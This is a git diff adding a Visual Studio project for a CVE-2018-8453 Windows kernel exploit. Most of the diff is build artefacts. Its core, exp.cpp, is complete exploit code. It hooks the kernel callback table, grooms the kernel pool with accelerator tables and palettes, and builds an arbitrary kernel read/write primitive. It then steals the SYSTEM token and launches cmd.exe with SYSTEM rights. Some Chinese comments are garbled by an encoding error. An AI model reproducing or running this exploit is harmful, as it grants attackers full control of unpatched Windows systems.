Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb
new file mode 100644
index 0000000..6e64077
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb
new file mode 100644
index 0000000..1e806de
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..dfcdb2b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\release\exp.obj
+c:\users\ze0r\desktop\exp\release\exp.exe
+c:\users\ze0r\desktop\exp\release\exp.ipdb
+c:\users\ze0r\desktop\exp\release\exp.iobj
+c:\users\ze0r\desktop\exp\release\exp.pdb
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log
new file mode 100644
index 0000000..fc264c8
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log
@@ -0,0 +1,7 @@
+ stdafx.cpp
+ exp.cpp
+ 正在生成代码
+ All 20 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ 已完成代码的生成
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Release\exp.exe
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj
new file mode 100644
index 0000000..331bd58
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch
new file mode 100644
index 0000000..6933438
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..647b9d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..6d7ddf0
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9d55f25
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..e1b782c
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|c:\users\ze0r\desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..f3e4814
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..865d309
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..b7c7941
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj
new file mode 100644
index 0000000..77c28d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb
new file mode 100644
index 0000000..07e2c76
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp
new file mode 100644
index 0000000..c440910
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp
@@ -0,0 +1,407 @@
+#include "stdio.h"
+#include "stdafx.h"
+#include "windows.h"
+#include "psapi.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc, int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr, DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i += 2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ printf("[*] Find Manager and Worker.\n");
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg && (*((DWORD*)(*msg)) == (DWORD)hSBWND)) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ //WM_TIMER��ʶScrollBar�Ѿ���ʼѭ��������Ϣ����ǿ���˳�xxxSBTrackLoop;
+ if (*msg && *(msg + 1) == WM_TIMER) {
+ printf("[*] Cancel xxxSBTrackLoop.\n");
+ SetCapture(hSBWNDnew);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ printf("[*] ReAlloc Memory.\n");
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel = (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮�ֳط�ˮʱ������Ķ�����������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xa0, 0x22);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+ printf("[*] Deploy Memory.\n");
+ BeforSBTrackAlloc();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ free(lpAccel);
+ return TRUE;
+}
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj
new file mode 100644
index 0000000..418e0c9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj
@@ -0,0 +1,165 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Use
+ Level3
+ Disabled
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreadedDebug
+
+
+ Console
+ true
+
+
+
+
+ Use
+ Level3
+ Disabled
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ Use
+ MaxSpeed
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+ Create
+ Create
+ Create
+ Create
+
+
+
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters
new file mode 100644
index 0000000..aafdea0
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj.filters
@@ -0,0 +1,36 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp
new file mode 100644
index 0000000..f026e66
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : ֻ�����������ļ���Դ�ļ�
+// exp.pch ����ΪԤ����ͷ
+// stdafx.obj ������Ԥ����������Ϣ
+
+#include "stdafx.h"
+
+// TODO: �� STDAFX.H �������κ�����ĸ���ͷ�ļ���
+//�������ڴ��ļ�������
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h
new file mode 100644
index 0000000..baa4bbc
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : ��ϵͳ�����ļ��İ����ļ���
+// ���Ǿ���ʹ�õ��������ĵ�
+// �ض�����Ŀ�İ����ļ�
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include
+#include
+
+
+
+// TODO: �ڴ˴����ó�����Ҫ������ͷ�ļ�
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h
new file mode 100644
index 0000000..416cebf
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// ���� SDKDDKVer.h ��������õ���߰汾�� Windows ƽ̨��
+
+// ���ҪΪ��ǰ�� Windows ƽ̨����Ӧ�ó�������� WinSDKVer.h������
+// �� _WIN32_WINNT ������ΪҪ֧�ֵ�ƽ̨��Ȼ���ٰ��� SDKDDKVer.h��
+
+#include
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch
new file mode 100644
index 0000000..e609501
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-12a44d53.ipch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/ipch/EXP-7a579913/EXP-c8e60a99.ipch
new file mode 100644
index 0000000..4adff5a
